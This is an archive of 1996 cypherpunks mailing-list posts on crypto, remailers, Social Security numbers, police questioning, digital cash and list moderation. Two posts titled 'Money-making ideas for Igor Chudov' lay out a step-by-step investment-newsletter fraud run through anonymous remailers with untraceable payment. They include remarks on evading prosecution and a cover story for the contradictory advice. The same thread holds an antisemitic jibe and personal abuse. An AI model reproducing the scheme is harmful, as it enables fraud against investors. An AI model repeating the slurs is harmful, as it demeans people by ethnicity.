questions of actions in the face of quandaries. the basic
cpunk philosophy, as amply illustrated by 2/3 of its founders, is
"look out for #1 only, and don't waste time on something as
inane as selfless public service or leadership"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 19:27:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A really short one time pad.
In-Reply-To: <199611130139.RAA14035@toad.com>
Message-ID: <v03007801aeaef123f2eb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:39 PM -0800 11/12/96, Sean Roach wrote:
>Actually, here are ten.
>2^.5
>3^.5
>2^(1/3)
>5^.5
>5^(1/3)
>7^.5
>11^.5
>13^.5
>17^.5
>Pi
>For that patter the nth root of any prime number.
>A lifetime of "pads" could be distributed in one trip.  Of course this still
>means that you have to make the trip, and write down all of the above with a
>referring codeword or number.
>Cheap, I know.  Wonder if this type of "one time pad" is as foolproof as
>truly randomly generated ones.

You needn't wonder. These are not one time pads. Read any opening chapter
of any book on crypto to see why.

However, there might be a good company you could put together around this idea.

(I wonder why nobody has thought of something so easy....)


--Tim


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 12 Nov 1996 19:57:48 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: Exon Countdown Clock and farewell messages
In-Reply-To: <199611120144.RAA16399@toad.com>
Message-ID: <Pine.SUN.3.91.961112195641.17323H-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I disagree. I think people understand the printing press and still want 
to control it. Morality police are morality police, no matter what the 
medium or how well they understand it.

-Declan


On Mon, 11 Nov 1996, Sean Roach wrote:

> At 09:59 AM 11/8/96 -0800, Michael Page wrote and Rich Graves forwarded:
> ...
> >We would attempt to send it via a Email, but the respected Senator does not
> >have Email. (The Irony).
> ...
> There is no irony here, Mr. Exon tried to control the internet for the very
> reason that he didn't understand it and one of his granddaughters did.
> Perhaps if he did understand the internet then he wouldn't be a threat.
> Remember, people fear that which they don't understand.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: luc pac <lucpac@freenet.hut.fi>
Date: Tue, 12 Nov 1996 11:18:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: anon remailer
Message-ID: <199611121917.VAA19844@freenet.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


hi --

i'm having a discussion with some people, trying to persuade them to set up
an anonymous remailer on an italian server.

i need a few technical data about how much computing resources does a
remailer take, how much ram, cpu time, average traffic and so.

since i can't deal with the huge (though interesting) traffic carried by
this list, i'm not going to subscribe. so please if you can help, contact me
privately at my address.

i feel that if i succeed, a new remailer would be of some help for the
entire cypherpunk community worldwide.

thanks.

---
Key fngrprnt (since 1993) =  52 DB 96 92 FA 1D CE 71  0D 63 96 E5 9A 9B 07 0A
http://www.geocities.com/Hollywood/3879





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 20:46:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Child Protective Services and Political Views
Message-ID: <328950B3.1B0E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> At 11:26 AM 11/12/96 -0800, Timothy C. May wrote:
> >Who knows, it may even be a
> >technical crime ("contributing to the delinquency of a minor"?) to even
> >discuss basic libertarian ideas with a minor. And as I said, Child
> >Protective Services could quite possibly seize a child whose parents were
> >sufficiently vocal about their beliefs.)

> One shouldn't be vocal to public employees in any case.  Avoid them.  If
> you are going to be vocal use a non government forum.  Separate your
> personal life from your political life.  It's not too hard to break most of
> the pointers between your physical presence and your ideological presence.
> Even though an investigator could find where I sleep at night, they would
> have to actually expend the resources.  My neighbors and the local cops are
> unlikely to make the connection because they and I move in very different
> circles and I minimize my database presence.

[snip]

Those people who live a very simple life [no TV, or at least no Cable TV,
sleep on the floor with a small, thin mattress, use very little power
outside of what's necessary for the laptop AC adapters, drive the smallest
cheapest car available, wear old clothing, wear a beard to cut down on
shaving, eat mostly veggie and mostly fresh, avoid doctors and drugstore
products, stay away from large-corporation jobs, move frequently, rent
but never buy, .... (you get the picture)] will get by just fine, and
will have the flexibility to make large-scale adjustments rather easily.

People who consider the opposite of some of the things mentioned above as
very important to them will have to deal with the bad news.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 01:44:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v02140b01aead9ffb76fb@[192.0.2.1]>
Message-ID: <199611120944.UAA13541@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 12 Nov 1996 21:06:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Secrecy: My life as a nym
Message-ID: <v02140b0eaeaf077188f4@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:14 PM 11/11/96 -0600, Igor Chudov wrote:
>
>>This is an interesting topic. I apologize if my questions are too trivial,
>>but here they are:
>>
>>       1) Can a person without an SSN have a credit record? Some
>>          may say that a credit record is a bad thing to have,
>>          but I am still interested in a possibility.
>>       2) Will private lenders (such as credit card issuers or
>>          mortgage companies) agree to extend credit to a person
>>          without an SSN or to someone who refuses to give out his SSN?
>>       3) Will the state issue a driver's license to someone who does not
>>          have/does not wish to give out their SSN?
>>       4) Will states' police (where applicable) approve purchases of
>>          firearms if purchasers do not state their ssn (misstating it
>>          may be a crime) on an application?
>>       5) Employers are required to pay certain taxes and therefore
>>          they, in my understanding, need to know their employees SSNs.
>>          How can people get around that (unless they do not need to work)?
>>       6) Can someone without an SSN obtain various kinds of insurance?
>>

Some recent congressional actions or court rulings regarding the mandidate
for SSN (Source: National Organization for Non-Enumeration (NONE),
http://ime.net/none):

* Public Law 104-193 President Clinton Signs Welfare Bill. The bill
includes a number of sections attempting to expand the use of the Social
Security number and creates new state and federal databases for personal
information.

* H.R. 3598 Prohibits certain misuses of the Social Security number.
Prohibits any person from utilizing any person's Social Security number for
purposes of identification of such person without the written consent of
such person.


* H.R. 3110 Disclosure of Social Security number. Provides for disclosure
by the Social Security Administration of Social Security numbers and other
records to judgments, or orders issued by courts of competent jurisdiction.

* H.R. 4209 Requires applicants registering to vote to provide Social
Security number. Amends the National Voter Registration Act of 1993 to
require each individual registering to vote in elections for Federal office
to provide the individual's Social Security number.

* S. 580 Illegal Immigration Control and Enforcement Act of 1995. Provides
for a reduction of acceptable employment-verification documents.

* S. 999 Illegal Immigration Control Act of 1995. Provides for the issuance
of enhanced social security cards for citizens and mandates employer
verification of the number.

* Olympia, Washington. Court rules no "right to labor" without social
security number.

* Bar None New Hampshire attorney, was suspended from the Maine Bar because
he refused to disclose his Social Security number. Reinstated after
agreeing to Consent Decree.

* Texas Tech Texan was terminated from his employment for failing to
provide a social security number. Filed a religious discrimination claim
with EEOC. Rehired under provisions of Consent Decree.

* Stop The Press Washington state youth was fired from his newpaper route
for not having a Social Security number. Rehired after proving federal law
does not require enumeration as a condition of employment.

* Vote! Vote! Virginia's law requiring all citizens to provide their Social
Security number in order to become registered to vote imposes "an
intolerable burden" on their right to vote.

* Taco's Are His Life Ohio teenager fired by Taco Bell for refusing to
provide a Social Security number. Rehired after proving there is no
requirement to provide number to employer.

* Social Security Number Not Needed For Licenses Virginians can choose not
to have their SSN appear on their driver's license.

* Driver License District of Columbia law requiring applicants for driver's
license to provide their Social Security number held invalid.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 12 Nov 1996 21:08:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Taxation Thought Experiment
Message-ID: <v02140b0faeaf07959179@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Blanc wrote:
>Just before the elections I heard on NPR and read in an article in a
>local newspaper, some people's stories of how they converted from
>Democrat to Republican.
>
>Most of them said that athough they were originally idealistic about all
>the good things which government can do, when they started their own
>businesses they were suddenly confronted with all the excruciating
>regulation and rigmarole which any business must deal with on a daily
>basis while just trying to get some work accomplished.   Very quickly
>they realized the consequences of a lot of the government proposals
>which they had heretofore supported.
>

A case in point: A small company which manufactures premium, hand-rolled,
cigars received a bill from the ATF for an unpaid tax and penalties.  The
notice indicated that the particular tax was over 5 years delinquint.  When
asked where in the over 500 pages of ATF regulations this tax was
documented the investigator said he didn't know and indeed didn't find it
after weeks of trying.  Finally and expert in D.C. found the obscure
reference.  The company wanted to know why they were being billed for this
tax after almost a decade of operation.  They were told that althought the
tax has been on the books the ATF had only recently programmed its
computers to access the tax.  Nevertheless, the tax and penalties were
owed, billed or not.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Nov 1996 19:00:53 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Conspiring to commit voodoo
In-Reply-To: <Pine.SUN.3.91.961111135201.12543A-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.94.961112003415.4477B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Nov 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Mon, 11 Nov 1996, Timothy C. May wrote:
> 
> > ...This benign neglect will probably change rather quickly if
> > one of the offshore betting markets starts carrying odds that a
> > particular judge or other public figure will be killed. And if
> > he _is_ killed, look for interrogations of the AP "ringleaders"
> > --and maybe many of the rest of us, who have spoken out for
> > anarchy and the like...
> 
> Just a reminder of the appropriate response in such a case.
> Just keep repeating the four magic words, "I want a lawyer."
> Co-operation buys you NOTHING.  (I hereby christen this the
> "Jewell Rule" for obvious and topical reasons.)

"Me too."

Seriously, this is the best course of action.

A friend of mine tells an interesting story.
On driving to a convenience store early in wee hours, he sees a man
splayed across the hood of a parked car, perhaps dead.  Being the good
citizen he is he tracks down a police car and reports the incident.
Instead of investigating the "body," the police decide to pull him over
and write him $700 in tickets for various fictitous violations (all of
which were later thrown out).  He, as would any reasonable
citizen, protested, not so much for the tickets, but for the
possibility that the prone man might need medical attention.
(The incident was not called in on the radio).  He took the
tickets and remarked something to the effect of, "I can't
believe this is what one gets for trying to be a good citizen,
trying to get involved."  Officer's response:  "Yep.  Next time 
don't bother."  Eventually, some 30 mintues later the police drive to the
location and revive what was a sleeping bum, take my friend to the station
and make him wake his wife to bail him out to the tune of $250.

Total cost: $300 in legal fees to fight the "violations."

>From that point on he vowed never to make statements to police except in
the highly unlikely event that he might somehow become the prime suspect
of a murder investigation and counsel suggested he do so.

Whenever a police officer asks questions more substantial than "can I see
your license" or "do you have registration" he simply clams up shurgs
his shoulders, or otherwise makes completely unsubstantial responses which
drip apathy from all four corners.

If questioned about his non-responsiveness he smiles patiently and begins
thusly:

"Let me tell you a story officer... once upon a time a man was minding his
own business at 2am on the way to the convenience store...."

You can never win.  Don't try.

Readers might remember my own account of being interrogated for attempting
to purchase a car in cash at a "we hate drug dealers" dealership in
Virginia.  Cops know enough to play on human nature.  Most people want to
show the officer they are cooperative, to prove their good will.  Most
people will try to win the war of wits and waive away all their rights
simply because an officer asks if its ok with you if he violates your
rights politely.

"If you have nothing to hide, why can't I search the trunk?"
"You don't mind if I come in do you?"
"Why don't you come down to the station, it will only take a few minutes."
"If I find anything after I get a warrant, I'm not going to be happy."
"We can do this the easy way, or the hard way."
"Who are you protecting?"
"Tell us how you found the napsack, we want to make a training video."

What most citizens fail to do is call the bluff.  If every citizen made
every curious police officer go to a magistrate and sign for a warrant,
police would be a whole lot more careful about which cases they decided to
bother a magistrate with.

Be patient.  Make them get the warrant.  Make sure you tell them,
politely, that it is your hope that more people will do as you have, that
the magistrate will begin to wonder at all the warrant applications that
are suddenly coming in for this officer and the lack of corresponding
arrests.  Perhaps someone will pay attention.

> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 12 Nov 1996 19:27:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Money-making ideas for Igor Chudov
In-Reply-To: <Pine.LNX.3.95.961112045010.17509B-100000@dhp.com>
Message-ID: <VBaBXD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:
> >
> > "Igor 'FUCK MNE HARDER' Chudov @ home" <ichudov@algebra.com> writes:
>
> algebra.com is a suspect domain.

Yes, Dr. Grubor - it's been implicated in Jan Isley's (spit) Usenet vote fraud:

]From: Jan Isley <jan@bagend.atl.ga.us>
  (spit)
]Newsgroups: news.announce.newgroups,news.groups,misc.invest,sci.econ,sci.econ.research,sci.stat.math
]Subject: RESULT: sci.finance.abstracts moderated passes 299:22
]Supersedes: <833766203.25886@uunet.uu.net>
]Followup-To: news.groups
]Date: 16 Jun 1996 20:53:15 -0400
]Organization: Usenet Volunteer Votetakers
]Lines: 475
]Sender: tale@uunet.uu.net
  (spit)
]Approved: newgroups-request@uunet.uu.net
]Message-ID: <834972791.18156@uunet.uu.net>
]References: <832958763.9345@uunet.uu.net> <833766203.25886@uunet.uu.net>
]NNTP-Posting-Host: rodan.uu.net
]Archive-Name: sci.finance.abstracts
]
]                                RESULT
]         moderated group sci.finance.abstracts passes 299:22
]
]sci.finance.abstracts results - 321 valid votes
]
] Yes  No  | 2/3 >100 | Pass | Group
]---- ---- | --- ---- | ---- | -------------------------------------------
] 299   22 | Yes  Yes |  Yes | sci.finance.abstracts
]   32 invalid votes
...
][ notes on the voter list:
]
]  31 "suspicious" votes from manifold.algebra.com were invalidated.
]  Most of the acks bounced and no response was recieved after multiple
]  attempts to verify the voters.
...
]
]Invalid ballots
]-------------------------------------------------------------------------------
]antosha@manifold.algebra.com                                    Anton Prokofiev
]    ! site invalidated
]blin@manifold.algebra.com                                             Bobby Lin
]    ! site invalidated
]brown@manifold.algebra.com                                           Brad Brown
]    ! site invalidated
]doug@manifold.algebra.com                                         Doug Hamilton
]    ! site invalidated
]dyer@manifold.algebra.com                                             Rock Dyer
]    ! site invalidated
]gcooper@manifold.algebra.com                                        Greg Cooper
]    ! site invalidated
]gunboy@manifold.algebra.com                                      Ronald Trecker
]    ! site invalidated
]kjh@manifold.algebra.com                                          Ken J. Hunter
]    ! site invalidated
]lenka@manifold.algebra.com                                        Elena Zaiceva
]    ! site invalidated
]mccaig@manifold.algebra.com                                       Andrew McCaig
]    ! site invalidated
]mel.lunch@manifold.algebra.com                                        Mel Lynch
]    ! site invalidated
]mikeb@manifold.algebra.com                                           Mike Burke
]    ! site invalidated
]mil@manifold.algebra.com                                         Milton Parrott
]    ! site invalidated
]milman@manifold.algebra.com                                        Jerry Milman
]    ! site invalidated
]mjohnson@manifold.algebra.com                                      Mark Johnson
]    ! site invalidated
]mklein@manifold.algebra.com                                        Martin Klein
]    ! site invalidated
]msidorova@manifold.algebra.com                                  Marina Sidorova
]    ! site invalidated
]munze@manifold.algebra.com                                          Martin Unze
]    ! site invalidated
]nastya@manifold.algebra.com                                              Nastya
]    ! site invalidated
]natasha@manifold.algebra.com                                         Natasha K.
]    ! site invalidated
]owen@manifold.algebra.com                                            Larry Owen
]    ! site invalidated
]pizza@manifold.algebra.com                                      Sergey Filippov
]    ! site invalidated
]rcross@manifold.algebra.com                                       Russell Cross
]    ! site invalidated
]rhenderson@manifold.algebra.com                                   Ron Henderson
]    ! site invalidated
]sexguru@manifold.algebra.com                                Anthony Del Vecchio
]    ! site invalidated
]smk@manifold.algebra.com                                        David Shoemaker
]    ! site invalidated
]tar@manifold.algebra.com                                        Mikhail Tarutin
]    ! site invalidated
]tarasik@manifold.algebra.com                                      Taras Leonoff
]    ! site invalidated
]volk@manifold.algebra.com                                        Mikhail Volkov
]    ! site invalidated
]whale@manifold.algebra.com                                      James S. Whaley
]    ! site invalidated
]willis@manifold.algebra.com                                          Tim Willis
]    ! site invalidated

Please consider declaring algebra.com and video-collage.com rogue sites.

> > > manifold::~==>premail -t cypherpunks@toad.com
> > > Chain: haystack;jam
> > > Subject: I urgently need a lot of money.
> > >
> > > Please share your money-making secrets, I am in a desperate need
> > > for cash.
> >
> > For shame! Igor Chewed-off disgraces his Chewish Mommy by even asking. Isn'
> > propensity for "gesheft" genetic? Here's another money-making idea for Igor
> >
> > Igor obtains a list of e-mail addresses of people interested in equity-rela
> > investments (e.g. by watching misc.invest.* and sending the posters / those
> > voted for their creation unsolicited e-mail; or by posting anonymous ads,
> > inviting the readers to reply to a reply block in order to receive 3 free
> > promotional issues of an investment advice newsletter; or even by starting
> > his own private financial derivatives mailing list). Igor divides the maili
> > list into 2^3=8 parts, and gives them exotic Russian-sounding names: Alekse
> > Boris, Vasilij, Grigorij, Dmitrij, Elena, Zhenja, Zoya.
> >
> > Igor then uses an anonymous remailer to spam everyone on his mailing list w
> > the 8 variants of the following message: "Congratulations! You have won 3 f
> > issued of the _Boris Investment Newsletter, published in Tulsa, Oklahoma, b
> > proud holder of a Master's Degree in Financial Engineering from the Moscow
> > State University. I predict that within the next month Adobe stock will go
> >
> > Instead of "Boris", Igor will substitute one of the 8 newsletter names; ins
> > of Adobe, he can use any volatile stock that's as likely to go up as down;
> > the predicted stock price movement will be "up" in the first four newslette
> > and "down" in the other four.
> >
> > One month later the stock in question is either up or down. Without loss of
> > generality, suppose that it's gone down. Aleksej, Boris, Vasilij, and
> > Grigorij's investment advice was wrong, they disappear from the face of the
> > earth, and the former recipients of their newsletters don't get bothered an
> > more. (Or they could be recycled for future scams; or they could be send th
> > remaining 2 issues of worthless advice, as promised.) On the other hand
> > Dmitrij, Elena, Zhenja, and Zoya guessed right, so this time they send out
> > new investment newsletter via the anonymous remailers:
> >
> > "Congratulations! You continue to receive the free investment advice newsle
> > from Zoya in Tulsa, Oklahoma. Last month I correctly predicted that Adobe w
> > have gone down. If you're smart, you've shorted Adobe's stock and made lots
> > money by now. This month I predict that Cisco will go _down as well."
> >
> > Again, Dmitrij and Elena predict that some other volatile stock goes up, wh
> > Zhenja and Zoya predict that it goes down. Suppose D&E are right. Igor leav
> > the Zh.&Z. partitions alone. One month later D&E's subscribers get letter #
> >
> > "Congratulations! You continue to receive the free investment advice newsle
> > from Elena in Tulsa, Oklahoma. Two months ago I predicted that Adobe would
> > down. I hope you sold it short. Last month I predicted that Cisco would go
> > I hope you bought it. This month I predict that Lucent will go _up."
> >
> > One month later one of the two is right, so its recipients get the fourth a
> > final e-mail from an anonymous remailer, this time using a reply block:
> >
> > "I've given you three free stock tips over the last 3 months which probably
> > made you a lot of money. Now that you've seen my track record, you'll want
> > continue receiving my free advice, but the free promotion is over. Please s
> > $20 in untraceable digital cash to this reply block to receive 6 future
> > issues."
> >
> > Quite a few people would risk the $20, but that would be the last they hear
> > from Igor. :-)
> >
> > (Alternatively, he can even e-mail 6 more issues of worthless advice to tho
> > who caughed up the $20, so they can't complain. It would be hard to prosecu
> > Igor without proving that all 8 newsletters were published by the same pers
> > who's been giving contradictory advice to different people.)
> >
> But what Law would you charge him with?
> Unless you could prove his "intent" I see no way that you
> could ever prove any case against him.

The intent is to defraud, but shouldn't absolute free speech protect fraud
and libel?

> > "Credibility is expendable." - John Gilmore
>
> He just says that because he spent his.

That's very true - he has none left whatsoever. What a sorry piece of work.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Tue, 12 Nov 1996 19:10:47 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <7gPaXD1w165w@bwalk.dm.com>
Message-ID: <m0vNVhe-0000rPC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM enscribed thusly:

> paul@fatmans.demon.co.uk writes:


> > > Yeah, right. Be sure to ask Paul Bradley to implement his brute force
> > > attack on one-time pads. :-)

> > I retracted this and as I explained the post was in error as I was 
> > talking about stream ciphers when I should have been taking about 
> > OTPs. Please read a little deeper into my post asshole.

> I've got more interesting things to do than read "deeper" into
> your ignorant drivel.

	Yeah - spouting your own ignorant drivel.

	DAMN!  Too easy!  :-)

> ---

> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 12 Nov 1996 22:42:21 -0800 (PST)
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
Message-ID: <199611130641.WAA27702@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:33 AM 11/12/96 -0800, Declan McCullagh wrote:
>The Netly News
>http://www.netlynews.com/
>November 11, 1996
>
>Cypher-Censored
>By Declan McCullagh (declan@well.com)
>...
>       That is, until recently, when Dimitri Vulis was given the boot.
>   After he refused to stop posting flames, rants and uninspired personal
>   attacks, Vulis was summarily removed from the mailing list.
>   
>...
>   
>       Thus began a debate over what the concept of censorship means in a
>   forum devoted to opposing it. Did Gilmore have the right to show Vulis
>   the virtual door? Or should he have let the ad hominem attacks
>   continue, encouraging people to set their filters accordingly? The
>   incident raises deeper questions about how a virtual community can
>   prevent one person from ruining the forum for all and whether only
>   government controls on expression can be called "censorship."

There is a serious error here.  Gilmore did nothing to prevent Vulis from
posting to the list.  He only prevented Vulis from receiving the list under
his own name.  And, the as hominem attacks continue.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Nov 1996 22:58:28 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
Message-ID: <199611130658.WAA07455@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 AM 11/13/96 +0000, The Deviant wrote:
>On Tue, 12 Nov 1996, jim bell wrote:
>
>> At 11:57 PM 11/11/96 -0500, Michael Froomkin - U.Miami School of Law wrote:
>>  Indeed, if Congress chose to license
>> >private mints, that would, IMHO be legal.  The point here is that the
>> >states don't have the power to coin money.
>> 
>> But, apparently, during the 1800's states (?) and individual banks did 
>> indeed print their own currency.
>> 
>> The way I see it, a positive statement in the Constitution that the Feds 
>> have the power to coin money does not necessarily exclude other 
>> people/banks/states/foreign countries from doing likewise.
>> 
>
>Hrmm.. One might point out that the only thing required for someone to
>"mint" (and I use this term loosely) money is for popular belief that the
>money is worth something.  What do you think a cashier's check is?  Other
>notable versions are (and I'm sure somebody is going to say "but its
>represintative of the US Dollar", even though its all dealing with money
>that really isn't there) is AmEx, MasterCard, Visa, etc.

This is yet another reason the Federal government is going to find it so 
difficult to ban or regulate digital cash.  With the collective precedents 
of paper money, then checks, then credit cards, then traveler's checks,  
then debit cards, and so forth, the addition of yet another medium of 
exchange doesn't appear to be a really new concept.  

Also, as far as I understand it, there is nothing illegal about spending (or 
accepting) foreign money inside the US, and in many if not most countries it 
is, likewise, not illegal to spend foreign money there as well.    
Obviously, the precedents allowing digital cash far outweigh those which 
could be marshalled to prohibit it.\




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Tue, 12 Nov 1996 19:57:38 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <v03007801aeae80c47f21@[207.167.93.63]>
Message-ID: <Pine.SUN.3.95L.961112224755.2462B-100000@bonjour.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Timothy C. May wrote:

> My piece was written as a rant about the dangers of the proposed talk of
> "privatizing food distribution points," about how this would result in a
> system where only the rich could get access to nutritional food, and how
> the poor would be made to suffer. And how this "caloric anarchy" would
> result in vicious monopolies, price wars, and deviation from Recommended
> Governmental Caloric Intake Rules.

Which it does...  FWIW, I tend to agree with your general point, but I
moved from downtown Manhattan to Harlem recently, and was surprised to see
how many foodstuffs cost _more_ up here, as well as the obvious fact that
many are harder to get...  Junk food and cheap liquor are everywhere,
though...

Which doesn't say that a centralized food distribution system would be a 
win, but don't bet on privatization being a win either.  Many of the local
stores won't even hire in the neighborhood...

Of course, with big supermarket chains finally breaking into this island,
that is becoming less of an issue, so maybe things will balance.  Looking 
around me, I'm not inclined to bet on it, tho.

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 12 Nov 1996 22:41:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Money-making ideas for Igor Chudov
In-Reply-To: <Pso9wD37w165w@bwalk.dm.com>
Message-ID: <199611130546.XAA07197@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> "Igor 'FUCK MNE HARDER' Chudov @ home" <ichudov@algebra.com> writes:
> Instead of "Boris", Igor will substitute one of the 8 newsletter names; instead
> of Adobe, he can use any volatile stock that's as likely to go up as down; and
> the predicted stock price movement will be "up" in the first four newsletters
> and "down" in the other four.
> 
> One month later the stock in question is either up or down. Without loss of
> generality, suppose that it's gone down. Aleksej, Boris, Vasilij, and
> Grigorij's investment advice was wrong, they disappear from the face of the
> earth, and the former recipients of their newsletters don't get bothered any
> more. (Or they could be recycled for future scams; or they could be send the
> remaining 2 issues of worthless advice, as promised.) On the other hand
> Dmitrij, Elena, Zhenja, and Zoya guessed right, so this time they send out a
> new investment newsletter via the anonymous remailers:
> 
> "Congratulations! You continue to receive the free investment advice newsletter
> from Zoya in Tulsa, Oklahoma. Last month I correctly predicted that Adobe will
> have gone down. If you're smart, you've shorted Adobe's stock and made lots of
> money by now. This month I predict that Cisco will go _down as well."
> 
> Again, Dmitrij and Elena predict that some other volatile stock goes up, while
> Zhenja and Zoya predict that it goes down. Suppose D&E are right. Igor leaves
> the Zh.&Z. partitions alone. One month later D&E's subscribers get letter #3:
> 
> "Congratulations! You continue to receive the free investment advice newsletter
> from Elena in Tulsa, Oklahoma. Two months ago I predicted that Adobe would go
> down. I hope you sold it short. Last month I predicted that Cisco would go up.
> I hope you bought it. This month I predict that Lucent will go _up."
> 
> One month later one of the two is right, so its recipients get the fourth and
> final e-mail from an anonymous remailer, this time using a reply block:
> 
> "I've given you three free stock tips over the last 3 months which probably
> made you a lot of money. Now that you've seen my track record, you'll want to
> continue receiving my free advice, but the free promotion is over. Please send
> $20 in untraceable digital cash to this reply block to receive 6 future
> issues."
> 
> Quite a few people would risk the $20, but that would be the last they hear
> from Igor. :-)
> 
> (Alternatively, he can even e-mail 6 more issues of worthless advice to those
> who caughed up the $20, so they can't complain. It would be hard to prosecute
> Igor without proving that all 8 newsletters were published by the same person
> who's been giving contradictory advice to different people.)

I can send all newsletters signed by myself, but claim that they are
produced by different numerical models for predicting (or derivatives')
returns. This way, even though I send out contradictory advice, I
could always say that I had several experimental programs.

It seems though that the market for advise newsletter has been saturated
by people who give random advices and hope to hit a jackpot, like
Garzarelli did with her "sell" advice before the '87 crash.

So my letters would be hardly noticed.

	- Igor.




